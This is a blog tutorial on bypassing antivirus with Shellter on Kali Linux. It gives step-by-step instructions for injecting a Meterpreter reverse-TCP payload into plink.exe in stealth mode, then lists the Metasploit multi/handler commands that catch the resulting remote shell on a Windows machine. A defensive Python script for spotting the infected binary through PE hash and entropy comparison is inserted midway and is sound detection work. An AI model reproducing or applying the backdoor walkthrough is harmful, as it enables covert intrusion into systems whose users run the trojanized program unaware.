Anti-Virus Bypass With Shellter 6.0 On Kali Linux - HacCoders

Thursday, 4 February 2016

Anti-Virus Bypass With Shellter 6.0 On Kali Linux

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

Hello everyone, and welcome to HacCoders (Information You Can Trust!). Today we will discuss anti-virus bypass with Shellter. But first, what is Shellter? Many people don't know, so let's start. :)

What Is Shellter?


Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
It can be used to inject shellcode into native Windows applications (currently 32-bit applications only).

The shellcode can be your own or something generated by a framework such as Metasploit.
Shellter takes advantage of the original structure of the PE file and does not apply any modification that would look suspicious under an AV scan, such as changing the memory access permissions of sections (unless the user asks for it) or adding an extra section with RWE access.

Shellter uses a unique dynamic approach based on the execution flow of the target application, and this is just the tip of the iceberg.

Shellter is not just an EPO infector that tries to find a location to insert an instruction that redirects execution to the payload. Unlike any other infector, Shellter's advanced infection engine never transfers the execution flow to a code cave or to an added section in the infected PE file.


So enough talk, let’s see it in action!

(Note: As always, never attempt to access a system that you do not have express written permission to access. Doing so is illegal and you could end up in jail.)

1. Download and install "shellter" ( https://www.shellterproject.com/download/ )
I saved the extracted folder to /root/Desktop. You will need to make shellter.exe executable with the chmod command.
2. Grab "plink.exe" from Kali's '/usr/share/windows-binaries' directory and copy it into the Shellter directory.
3. Change to the '/root/Desktop/shellter' directory.
4. Start Shellter by typing "wine shellter.exe".

5. Enter “A” for automatic
6. At the PE Target Prompt, enter "plink.exe".
7. When prompted to enable stealth mode enter “Y”:

This new feature allows the backdoored file to keep functioning as the original file did. A big help for Red Team pentesters.

8. When prompted for Payloads select “L” and then “1” for Meterpreter_Reverse_TCP.
9. Enter your Kali IP address for LHOST.
10. Enter a port to use (I used 4545)

Shellter then adds polymorphic code, obfuscates the file, and reports when it is done.

You will now have a ‘plink.exe’ (the shellcoded file) and ‘plink.exe.bak’ (the original file) in the Shellter directory.
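Having the original and the modified binary side by side is exactly the situation a defender wants to be in. The Shellter description above says the tool writes its code into an existing section without adding a section or changing section permissions, so a naive comparison of section tables between 'plink.exe.bak' and 'plink.exe' shows nothing, while the bytes inside .text, the file hash, and any Authenticode signature all change. The script below makes that visible. It is an added example, not code from this post or from Shellter; `parse_sections`, `diff_pe` and `build_toy_pe` are written here, and the two PE images it compares are constructed in memory so that it runs offline. On a real system you would pass the bytes of a vendor-supplied plink.exe and the suspect file to `diff_pe`.

```python
"""Compare a PE file against a known-good copy and report what changed.

Added example (not part of the original post, not Shellter's code). The
two images compared by build_demo_pair() are constructed here so the
script runs offline; check_files() does the same for real files on disk.
"""
import hashlib
import math
import struct
from dataclasses import dataclass

SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


@dataclass(frozen=True)
class Section:
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    raw_offset: int
    characteristics: int  # the R/W/X flags Shellter claims to leave untouched


def parse_sections(pe: bytes) -> list[Section]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]  # e_lfanew
    if pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", pe, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", pe, pe_off + 20)[0]
    table = pe_off + 24 + opt_size  # 4 (signature) + 20 (COFF) + optional header
    sections = []
    for i in range(num_sections):
        name, vsize, vaddr, rsize, roff, _, _, _, _, chars = struct.unpack_from(
            SECTION_FMT, pe, table + 40 * i)
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                vsize, vaddr, rsize, roff, chars))
    return sections


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: plain x86 code sits low, encoded payloads sit high."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def diff_pe(original: bytes, suspect: bytes) -> dict:
    """Whole-file hash check plus per-section byte and entropy comparison."""
    orig_secs, susp_secs = parse_sections(original), parse_sections(suspect)
    changed = []
    for o, s in zip(orig_secs, susp_secs):
        a = original[o.raw_offset:o.raw_offset + o.raw_size]
        b = suspect[s.raw_offset:s.raw_offset + s.raw_size]
        differing = sum(x != y for x, y in zip(a, b)) + abs(len(a) - len(b))
        if differing:
            changed.append({"name": o.name, "differing_bytes": differing,
                            "entropy_before": round(shannon_entropy(a), 3),
                            "entropy_after": round(shannon_entropy(b), 3)})
    return {
        "sha256_match": hashlib.sha256(original).digest() == hashlib.sha256(suspect).digest(),
        "section_table_match": orig_secs == susp_secs,  # names, sizes, offsets, permissions
        "changed_sections": changed,
    }


def check_files(known_good_path: str, suspect_path: str) -> dict:
    """Same comparison for two files on disk (e.g. a vendor copy vs. the suspect)."""
    with open(known_good_path, "rb") as f, open(suspect_path, "rb") as g:
        return diff_pe(f.read(), g.read())


def build_toy_pe(text: bytes, data: bytes) -> bytes:
    """Constructed minimal PE32 image: headers in the first 0x200 bytes, then .text and .data."""
    opt_size = 224
    hdr = bytearray(64)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)  # e_lfanew -> PE signature at 0x40
    hdr += b"PE\0\0"
    hdr += struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x0102)  # i386, 2 sections
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic; the rest is irrelevant here
    hdr += opt
    hdr += struct.pack(SECTION_FMT, b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    hdr += struct.pack(SECTION_FMT, b".data", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    return bytes(hdr).ljust(0x200, b"\0") + text.ljust(0x200, b"\0") + data.ljust(0x200, b"\0")


def build_demo_pair() -> tuple[bytes, bytes]:
    """Constructed stand-ins for plink.exe.bak (clean) and plink.exe (128 bytes
    of .text overwritten in place, section table left exactly as it was)."""
    prologue = b"\x55\x8b\xec\x83\xec\x10"  # push ebp; mov ebp,esp; sub esp,0x10
    text = (prologue * (0x200 // len(prologue))).ljust(0x200, b"\0")
    data = b"constructed .data section, unchanged\0"
    clean = build_toy_pe(text, data)
    blob = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(4))  # 128 high-entropy bytes
    patched = bytearray(text)
    patched[0x40:0x40 + len(blob)] = blob
    return clean, build_toy_pe(bytes(patched), data)


if __name__ == "__main__":
    import json
    clean, suspect = build_demo_pair()
    print(json.dumps(diff_pe(clean, suspect), indent=2))
```

Run against the demo pair, the report shows `sha256_match` false, `section_table_match` true, and a single changed section, `.text`, whose entropy went up. The point for a defender is that section-level metadata is not a useful integrity signal against this kind of infector; a hash or signature check against a copy you trust is. For plink.exe specifically the quickest check on the Windows side is the Authenticode signature (for example `Get-AuthenticodeSignature` in PowerShell), which no longer validates once the code bytes have been rewritten. Compare against a copy obtained from the vendor rather than the .bak file sitting next to the suspect, since an attacker controls both.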

11. Now we need to start a listener service on the Kali system using the same settings from above:
  • start Metasploit (‘msfconsole’ in a terminal)
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost 192.168.1.39
  • set lport 4545
  • exploit

12. Copy the ‘plink.exe’ file to the Windows system:

13. Now, in Windows, if you run plink.exe from the command prompt:

It prints the program's help information but does not trigger the remote shell yet. If we actually use plink to connect to another system (a Raspberry Pi), however:

Notice that we get the Raspberry Pi SSH login prompt through plink, but we also get a remote session to the Windows box:

We can run "sysinfo" to view information about the computer:

So we succeeded. Thanks for reading.
